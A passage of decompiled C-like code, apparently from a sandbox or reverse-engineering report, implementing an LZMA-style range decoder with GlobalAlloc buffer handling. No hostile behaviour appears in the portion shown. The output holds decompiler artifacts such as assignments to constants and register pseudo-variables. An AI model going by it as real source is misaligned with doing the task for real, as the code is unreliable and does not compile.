                                  											_t546 =  *(_t613 - 0x40);
                                  											if(_t546 ==  *(_t613 - 0x74)) {
                                  												L20:
                                  												 *(_t613 - 0x48) = 5;
                                  												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                  												goto L23;
                                  											}
                                  											 *(_t613 - 0x74) = _t546;
                                  											if( *(_t613 - 8) != 0) {
                                  												GlobalFree( *(_t613 - 8));
                                  											}
                                  											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                  											 *(_t613 - 8) = _t534;
                                  											if(_t534 == 0) {
                                  												goto L171;
                                  											} else {
                                  												goto L20;
                                  											}
                                  										case 2:
                                  											L24:
                                  											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                  											 *(_t613 - 0x84) = 6;
                                  											 *(_t613 - 0x4c) = _t553;
                                  											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                                  											 *(_t613 - 0x54) = _t606;
                                  											goto L133;
                                  										case 3:
                                  											L21:
                                  											__eflags =  *(_t613 - 0x6c);
                                  											if( *(_t613 - 0x6c) == 0) {
                                  												 *(_t613 - 0x88) = 3;
                                  												goto L170;
                                  											}
                                  											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                  											_t67 = _t613 - 0x70;
                                  											 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                  											__eflags =  *_t67;
                                  											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                  											L23:
                                  											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                  											if( *(_t613 - 0x48) != 0) {
                                  												goto L21;
                                  											}
                                  											goto L24;
                                  										case 4:
                                  											L133:
                                  											_t531 =  *_t606;
                                  											_t589 = _t531 & 0x0000ffff;
                                  											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                  											if( *(_t613 - 0xc) >= _t565) {
                                  												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                  												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                  												 *(_t613 - 0x40) = 1;
                                  												_t532 = _t531 - (_t531 >> 5);
                                  												 *_t606 = _t532;
                                  											} else {
                                  												 *(_t613 - 0x10) = _t565;
                                  												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                  												 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                  											}
                                  											if( *(_t613 - 0x10) >= 0x1000000) {
                                  												goto L139;
                                  											}
                                  										case 5:
                                  											goto L137;
                                  										case 6:
                                  											__edx = 0;
                                  											__eflags =  *(__ebp - 0x40);
                                  											if( *(__ebp - 0x40) != 0) {
                                  												__eax =  *(__ebp - 4);
                                  												__ecx =  *(__ebp - 0x38);
                                  												 *(__ebp - 0x34) = 1;
                                  												 *(__ebp - 0x84) = 7;
                                  												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                  												while(1) {
                                  													 *(_t613 - 0x54) = _t606;
                                  													goto L133;
                                  												}
                                  											}
                                  											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                  											__esi =  *(__ebp - 0x60);
                                  											__cl = 8;
                                  											__cl = 8 -  *(__ebp - 0x3c);
                                  											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                  											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                  											__ecx =  *(__ebp - 0x3c);
                                  											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                  											__ecx =  *(__ebp - 4);
                                  											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                  											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                  											__eflags =  *(__ebp - 0x38) - 4;
                                  											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                  											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                  											if( *(__ebp - 0x38) >= 4) {
                                  												__eflags =  *(__ebp - 0x38) - 0xa;
                                  												if( *(__ebp - 0x38) >= 0xa) {
                                  													_t98 = __ebp - 0x38;
                                  													 *_t98 =  *(__ebp - 0x38) - 6;
                                  													__eflags =  *_t98;
                                  												} else {
                                  													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                  												}
                                  											} else {
                                  												 *(__ebp - 0x38) = 0;
                                  											}
                                  											__eflags =  *(__ebp - 0x34) - __edx;
                                  											if( *(__ebp - 0x34) == __edx) {
                                  												__ebx = 0;
                                  												__ebx = 1;
                                  												goto L61;
                                  											} else {
                                  												__eax =  *(__ebp - 0x14);
                                  												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                  												__eflags = __eax -  *(__ebp - 0x74);
                                  												if(__eax >=  *(__ebp - 0x74)) {
                                  													__eax = __eax +  *(__ebp - 0x74);
                                  													__eflags = __eax;
                                  												}
                                  												__ecx =  *(__ebp - 8);
                                  												__ebx = 0;
                                  												__ebx = 1;
                                  												__al =  *((intOrPtr*)(__eax + __ecx));
                                  												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                  												goto L41;
                                  											}
                                  										case 7:
                                  											__eflags =  *(__ebp - 0x40) - 1;
                                  											if( *(__ebp - 0x40) != 1) {
                                  												__eax =  *(__ebp - 0x24);
                                  												 *(__ebp - 0x80) = 0x16;
                                  												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                  												__eax =  *(__ebp - 0x28);
                                  												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                  												__eax =  *(__ebp - 0x2c);
                                  												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                  												__eax = 0;
                                  												__eflags =  *(__ebp - 0x38) - 7;
                                  												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                  												__al = __al & 0x000000fd;
                                  												__eax = (__eflags >= 0) - 1 + 0xa;
                                  												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                  												__eax =  *(__ebp - 4);
                                  												__eax =  *(__ebp - 4) + 0x664;
                                  												__eflags = __eax;
                                  												 *(__ebp - 0x58) = __eax;
                                  												goto L69;
                                  											}
                                  											__eax =  *(__ebp - 4);
                                  											__ecx =  *(__ebp - 0x38);
                                  											 *(__ebp - 0x84) = 8;
                                  											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                  											while(1) {
                                  												 *(_t613 - 0x54) = _t606;
                                  												goto L133;
                                  											}
                                  										case 8:
                                  											goto L0;
                                  										case 9:
                                  											__eflags =  *(__ebp - 0x40);
                                  											if( *(__ebp - 0x40) != 0) {
                                  												goto L89;
                                  											}
                                  											__eflags =  *(__ebp - 0x60);
                                  											if( *(__ebp - 0x60) == 0) {
                                  												goto L171;
                                  											}
                                  											__eax = 0;
                                  											__eflags =  *(__ebp - 0x38) - 7;
                                  											_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                  											__eflags = _t258;
                                  											0 | _t258 = _t258 + _t258 + 9;
                                  											 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                  											goto L75;
                                  										case 0xa:
                                  											__eflags =  *(__ebp - 0x40);
                                  											if( *(__ebp - 0x40) != 0) {
                                  												__eax =  *(__ebp - 4);
                                  												__ecx =  *(__ebp - 0x38);
                                  												 *(__ebp - 0x84) = 0xb;
                                  												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                  												while(1) {
                                  													 *(_t613 - 0x54) = _t606;
                                  													goto L133;
                                  												}
                                  											}
                                  											__eax =  *(__ebp - 0x28);
                                  											goto L88;
                                  										case 0xb:
                                  											__eflags =  *(__ebp - 0x40);
                                  											if( *(__ebp - 0x40) != 0) {
                                  												__ecx =  *(__ebp - 0x24);
                                  												__eax =  *(__ebp - 0x20);
                                  												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                  											} else {
                                  												__eax =  *(__ebp - 0x24);
                                  											}
                                  											__ecx =  *(__ebp - 0x28);
                                  											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                  											L88:
                                  											__ecx =  *(__ebp - 0x2c);
                                  											 *(__ebp - 0x2c) = __eax;
                                  											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                  											L89:
                                  											__eax =  *(__ebp - 4);
                                  											 *(__ebp - 0x80) = 0x15;
                                  											__eax =  *(__ebp - 4) + 0xa68;
                                  											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                  											goto L69;
                                  										case 0xc:
                                  											L99:
                                  											__eflags =  *(__ebp - 0x6c);
                                  											if( *(__ebp - 0x6c) == 0) {
                                  												 *(__ebp - 0x88) = 0xc;
                                  												goto L170;
                                  											}
                                  											__ecx =  *(__ebp - 0x70);
                                  											__eax =  *(__ebp - 0xc);
                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											_t334 = __ebp - 0x70;
                                  											 *_t334 =  *(__ebp - 0x70) + 1;
                                  											__eflags =  *_t334;
                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											__eax =  *(__ebp - 0x2c);
                                  											goto L101;
                                  										case 0xd:
                                  											L37:
                                  											__eflags =  *(__ebp - 0x6c);
                                  											if( *(__ebp - 0x6c) == 0) {
                                  												 *(__ebp - 0x88) = 0xd;
                                  												goto L170;
                                  											}
                                  											__ecx =  *(__ebp - 0x70);
                                  											__eax =  *(__ebp - 0xc);
                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											_t122 = __ebp - 0x70;
                                  											 *_t122 =  *(__ebp - 0x70) + 1;
                                  											__eflags =  *_t122;
                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											L39:
                                  											__eax =  *(__ebp - 0x40);
                                  											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                  											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                  												goto L48;
                                  											}
                                  											__eflags = __ebx - 0x100;
                                  											if(__ebx >= 0x100) {
                                  												goto L54;
                                  											}
                                  											L41:
                                  											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                  											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                  											__ecx =  *(__ebp - 0x58);
                                  											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                  											 *(__ebp - 0x48) = __eax;
                                  											__eax = __eax + 1;
                                  											__eax = __eax << 8;
                                  											__eax = __eax + __ebx;
                                  											__esi =  *(__ebp - 0x58) + __eax * 2;
                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                  											__ax =  *__esi;
                                  											 *(__ebp - 0x54) = __esi;
                                  											__edx = __ax & 0x0000ffff;
                                  											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                  											__eflags =  *(__ebp - 0xc) - __ecx;
                                  											if( *(__ebp - 0xc) >= __ecx) {
                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                  												__cx = __ax;
                                  												 *(__ebp - 0x40) = 1;
                                  												__cx = __ax >> 5;
                                  												__eflags = __eax;
                                  												__ebx = __ebx + __ebx + 1;
                                  												 *__esi = __ax;
                                  											} else {
                                  												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                  												 *(__ebp - 0x10) = __ecx;
                                  												0x800 = 0x800 - __edx;
                                  												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                  												__ebx = __ebx + __ebx;
                                  												 *__esi = __cx;
                                  											}
                                  											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                  											 *(__ebp - 0x44) = __ebx;
                                  											if( *(__ebp - 0x10) >= 0x1000000) {
                                  												goto L39;
                                  											} else {
                                  												goto L37;
                                  											}
                                  										case 0xe:
                                  											L46:
                                  											__eflags =  *(__ebp - 0x6c);
                                  											if( *(__ebp - 0x6c) == 0) {
                                  												 *(__ebp - 0x88) = 0xe;
                                  												goto L170;
                                  											}
                                  											__ecx =  *(__ebp - 0x70);
                                  											__eax =  *(__ebp - 0xc);
                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											_t156 = __ebp - 0x70;
                                  											 *_t156 =  *(__ebp - 0x70) + 1;
                                  											__eflags =  *_t156;
                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											while(1) {
                                  												L48:
                                  												__eflags = __ebx - 0x100;
                                  												if(__ebx >= 0x100) {
                                  													break;
                                  												}
                                  												__eax =  *(__ebp - 0x58);
                                  												__edx = __ebx + __ebx;
                                  												__ecx =  *(__ebp - 0x10);
                                  												__esi = __edx + __eax;
                                  												__ecx =  *(__ebp - 0x10) >> 0xb;
                                  												__ax =  *__esi;
                                  												 *(__ebp - 0x54) = __esi;
                                  												__edi = __ax & 0x0000ffff;
                                  												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                  												__eflags =  *(__ebp - 0xc) - __ecx;
                                  												if( *(__ebp - 0xc) >= __ecx) {
                                  													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                  													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                  													__cx = __ax;
                                  													_t170 = __edx + 1; // 0x1
                                  													__ebx = _t170;
                                  													__cx = __ax >> 5;
                                  													__eflags = __eax;
                                  													 *__esi = __ax;
                                  												} else {
                                  													 *(__ebp - 0x10) = __ecx;
                                  													0x800 = 0x800 - __edi;
                                  													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                  													__ebx = __ebx + __ebx;
                                  													 *__esi = __cx;
                                  												}
                                  												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                  												 *(__ebp - 0x44) = __ebx;
                                  												if( *(__ebp - 0x10) >= 0x1000000) {
                                  													continue;
                                  												} else {
                                  													goto L46;
                                  												}
                                  											}
                                  											L54:
                                  											_t173 = __ebp - 0x34;
                                  											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                  											__eflags =  *_t173;
                                  											goto L55;
                                  										case 0xf:
                                  											L58:
                                  											__eflags =  *(__ebp - 0x6c);
                                  											if( *(__ebp - 0x6c) == 0) {
                                  												 *(__ebp - 0x88) = 0xf;
                                  												goto L170;
                                  											}
                                  											__ecx =  *(__ebp - 0x70);
                                  											__eax =  *(__ebp - 0xc);
                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											_t203 = __ebp - 0x70;
                                  											 *_t203 =  *(__ebp - 0x70) + 1;
                                  											__eflags =  *_t203;
                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											L60:
                                  											__eflags = __ebx - 0x100;
                                  											if(__ebx >= 0x100) {
                                  												L55:
                                  												__al =  *(__ebp - 0x44);
                                  												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                  												goto L56;
                                  											}
                                  											L61:
                                  											__eax =  *(__ebp - 0x58);
                                  											__edx = __ebx + __ebx;
                                  											__ecx =  *(__ebp - 0x10);
                                  											__esi = __edx + __eax;
                                  											__ecx =  *(__ebp - 0x10) >> 0xb;
                                  											__ax =  *__esi;
                                  											 *(__ebp - 0x54) = __esi;
                                  											__edi = __ax & 0x0000ffff;
                                  											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                  											__eflags =  *(__ebp - 0xc) - __ecx;
                                  											if( *(__ebp - 0xc) >= __ecx) {
                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                  												__cx = __ax;
                                  												_t217 = __edx + 1; // 0x1
                                  												__ebx = _t217;
                                  												__cx = __ax >> 5;
                                  												__eflags = __eax;
                                  												 *__esi = __ax;
                                  											} else {
                                  												 *(__ebp - 0x10) = __ecx;
                                  												0x800 = 0x800 - __edi;
                                  												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                  												__ebx = __ebx + __ebx;
                                  												 *__esi = __cx;
                                  											}
                                  											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                  											 *(__ebp - 0x44) = __ebx;
                                  											if( *(__ebp - 0x10) >= 0x1000000) {
                                  												goto L60;
                                  											} else {
                                  												goto L58;
                                  											}
                                  										case 0x10:
                                  											L109:
                                  											__eflags =  *(__ebp - 0x6c);
                                  											if( *(__ebp - 0x6c) == 0) {
                                  												 *(__ebp - 0x88) = 0x10;
                                  												goto L170;
                                  											}
                                  											__ecx =  *(__ebp - 0x70);
                                  											__eax =  *(__ebp - 0xc);
                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											_t365 = __ebp - 0x70;
                                  											 *_t365 =  *(__ebp - 0x70) + 1;
                                  											__eflags =  *_t365;
                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											goto L111;
                                  										case 0x11:
                                  											L69:
                                  											__esi =  *(__ebp - 0x58);
                                  											 *(__ebp - 0x84) = 0x12;
                                  											while(1) {
                                  												 *(_t613 - 0x54) = _t606;
                                  												goto L133;
                                  											}
                                  										case 0x12:
                                  											__eflags =  *(__ebp - 0x40);
                                  											if( *(__ebp - 0x40) != 0) {
                                  												__eax =  *(__ebp - 0x58);
                                  												 *(__ebp - 0x84) = 0x13;
                                  												__esi =  *(__ebp - 0x58) + 2;
                                  												while(1) {
                                  													 *(_t613 - 0x54) = _t606;
                                  													goto L133;
                                  												}
                                  											}
                                  											__eax =  *(__ebp - 0x4c);
                                  											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                  											__ecx =  *(__ebp - 0x58);
                                  											__eax =  *(__ebp - 0x4c) << 4;
                                  											__eflags = __eax;
                                  											__eax =  *(__ebp - 0x58) + __eax + 4;
                                  											goto L130;
                                  										case 0x13:
                                  											__eflags =  *(__ebp - 0x40);
                                  											if( *(__ebp - 0x40) != 0) {
                                  												_t469 = __ebp - 0x58;
                                  												 *_t469 =  *(__ebp - 0x58) + 0x204;
                                  												__eflags =  *_t469;
                                  												 *(__ebp - 0x30) = 0x10;
                                  												 *(__ebp - 0x40) = 8;
                                  												L144:
                                  												 *(__ebp - 0x7c) = 0x14;
                                  												goto L145;
                                  											}
                                  											__eax =  *(__ebp - 0x4c);
                                  											__ecx =  *(__ebp - 0x58);
                                  											__eax =  *(__ebp - 0x4c) << 4;
                                  											 *(__ebp - 0x30) = 8;
                                  											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                  											L130:
                                  											 *(__ebp - 0x58) = __eax;
                                  											 *(__ebp - 0x40) = 3;
                                  											goto L144;
                                  										case 0x14:
                                  											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                  											__eax =  *(__ebp - 0x80);
                                  											 *(_t613 - 0x88) = _t533;
                                  											goto L1;
                                  										case 0x15:
                                  											__eax = 0;
                                  											__eflags =  *(__ebp - 0x38) - 7;
                                  											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                  											__al = __al & 0x000000fd;
                                  											__eax = (__eflags >= 0) - 1 + 0xb;
                                  											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                  											goto L120;
                                  										case 0x16:
                                  											__eax =  *(__ebp - 0x30);
                                  											__eflags = __eax - 4;
                                  											if(__eax >= 4) {
                                  												_push(3);
                                  												_pop(__eax);
                                  											}
                                  											__ecx =  *(__ebp - 4);
                                  											 *(__ebp - 0x40) = 6;
                                  											__eax = __eax << 7;
                                  											 *(__ebp - 0x7c) = 0x19;
                                  											 *(__ebp - 0x58) = __eax;
                                  											goto L145;
                                  										case 0x17:
                                  											L145:
                                  											__eax =  *(__ebp - 0x40);
                                  											 *(__ebp - 0x50) = 1;
                                  											 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                  											goto L149;
                                  										case 0x18:
                                  											L146:
                                  											__eflags =  *(__ebp - 0x6c);
                                  											if( *(__ebp - 0x6c) == 0) {
                                  												 *(__ebp - 0x88) = 0x18;
                                  												goto L170;
                                  											}
                                  											__ecx =  *(__ebp - 0x70);
                                  											__eax =  *(__ebp - 0xc);
                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											_t484 = __ebp - 0x70;
                                  											 *_t484 =  *(__ebp - 0x70) + 1;
                                  											__eflags =  *_t484;
                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											L148:
                                  											_t487 = __ebp - 0x48;
                                  											 *_t487 =  *(__ebp - 0x48) - 1;
                                  											__eflags =  *_t487;
                                  											L149:
                                  											__eflags =  *(__ebp - 0x48);
                                  											if( *(__ebp - 0x48) <= 0) {
                                  												__ecx =  *(__ebp - 0x40);
                                  												__ebx =  *(__ebp - 0x50);
                                  												0 = 1;
                                  												__eax = 1 << __cl;
                                  												__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                  												__eax =  *(__ebp - 0x7c);
                                  												 *(__ebp - 0x44) = __ebx;
                                  												while(1) {
                                  													 *(_t613 - 0x88) = _t533;
                                  													goto L1;
                                  												}
                                  											}
                                  											__eax =  *(__ebp - 0x50);
                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                  											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                  											__eax =  *(__ebp - 0x58);
                                  											__esi = __edx + __eax;
                                  											 *(__ebp - 0x54) = __esi;
                                  											__ax =  *__esi;
                                  											__edi = __ax & 0x0000ffff;
                                  											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                  											__eflags =  *(__ebp - 0xc) - __ecx;
                                  											if( *(__ebp - 0xc) >= __ecx) {
                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                  												__cx = __ax;
                                  												__cx = __ax >> 5;
                                  												__eax = __eax - __ecx;
                                  												__edx = __edx + 1;
                                  												__eflags = __edx;
                                  												 *__esi = __ax;
                                  												 *(__ebp - 0x50) = __edx;
                                  											} else {
                                  												 *(__ebp - 0x10) = __ecx;
                                  												0x800 = 0x800 - __edi;
                                  												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                  												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                  												 *__esi = __cx;
                                  											}
                                  											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                  											if( *(__ebp - 0x10) >= 0x1000000) {
                                  												goto L148;
                                  											} else {
                                  												goto L146;
                                  											}
                                  										case 0x19:
                                  											__eflags = __ebx - 4;
                                  											if(__ebx < 4) {
                                  												 *(__ebp - 0x2c) = __ebx;
                                  												L119:
                                  												_t393 = __ebp - 0x2c;
                                  												 *_t393 =  *(__ebp - 0x2c) + 1;
                                  												__eflags =  *_t393;
                                  												L120:
                                  												__eax =  *(__ebp - 0x2c);
                                  												__eflags = __eax;
                                  												if(__eax == 0) {
                                  													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                  													goto L170;
                                  												}
                                  												__eflags = __eax -  *(__ebp - 0x60);
                                  												if(__eax >  *(__ebp - 0x60)) {
                                  													goto L171;
                                  												}
                                  												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                  												__eax =  *(__ebp - 0x30);
                                  												_t400 = __ebp - 0x60;
                                  												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                  												__eflags =  *_t400;
                                  												goto L123;
                                  											}
                                  											__ecx = __ebx;
                                  											__eax = __ebx;
                                  											__ecx = __ebx >> 1;
                                  											__eax = __ebx & 0x00000001;
                                  											__ecx = (__ebx >> 1) - 1;
                                  											__al = __al | 0x00000002;
                                  											__eax = (__ebx & 0x00000001) << __cl;
                                  											__eflags = __ebx - 0xe;
                                  											 *(__ebp - 0x2c) = __eax;
                                  											if(__ebx >= 0xe) {
                                  												__ebx = 0;
                                  												 *(__ebp - 0x48) = __ecx;
                                  												L102:
                                  												__eflags =  *(__ebp - 0x48);
                                  												if( *(__ebp - 0x48) <= 0) {
                                  													__eax = __eax + __ebx;
                                  													 *(__ebp - 0x40) = 4;
                                  													 *(__ebp - 0x2c) = __eax;
                                  													__eax =  *(__ebp - 4);
                                  													__eax =  *(__ebp - 4) + 0x644;
                                  													__eflags = __eax;
                                  													L108:
                                  													__ebx = 0;
                                  													 *(__ebp - 0x58) = __eax;
                                  													 *(__ebp - 0x50) = 1;
                                  													 *(__ebp - 0x44) = 0;
                                  													 *(__ebp - 0x48) = 0;
                                  													L112:
                                  													__eax =  *(__ebp - 0x40);
                                  													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                  													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                  														_t391 = __ebp - 0x2c;
                                  														 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                  														__eflags =  *_t391;
                                  														goto L119;
                                  													}
                                  													__eax =  *(__ebp - 0x50);
                                  													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                  													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                  													__eax =  *(__ebp - 0x58);
                                  													__esi = __edi + __eax;
                                  													 *(__ebp - 0x54) = __esi;
                                  													__ax =  *__esi;
                                  													__ecx = __ax & 0x0000ffff;
                                  													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                  													__eflags =  *(__ebp - 0xc) - __edx;
                                  													if( *(__ebp - 0xc) >= __edx) {
                                  														__ecx = 0;
                                  														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                  														__ecx = 1;
                                  														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                  														__ebx = 1;
                                  														__ecx =  *(__ebp - 0x48);
                                  														__ebx = 1 << __cl;
                                  														__ecx = 1 << __cl;
                                  														__ebx =  *(__ebp - 0x44);
                                  														__ebx =  *(__ebp - 0x44) | __ecx;
                                  														__cx = __ax;
                                  														__cx = __ax >> 5;
                                  														__eax = __eax - __ecx;
                                  														__edi = __edi + 1;
                                  														__eflags = __edi;
                                  														 *(__ebp - 0x44) = __ebx;
                                  														 *__esi = __ax;
                                  														 *(__ebp - 0x50) = __edi;
                                  													} else {
                                  														 *(__ebp - 0x10) = __edx;
                                  														0x800 = 0x800 - __ecx;
                                  														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                  														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                  														 *__esi = __dx;
                                  													}
                                  													__eflags =  *(__ebp - 0x10) - 0x1000000;
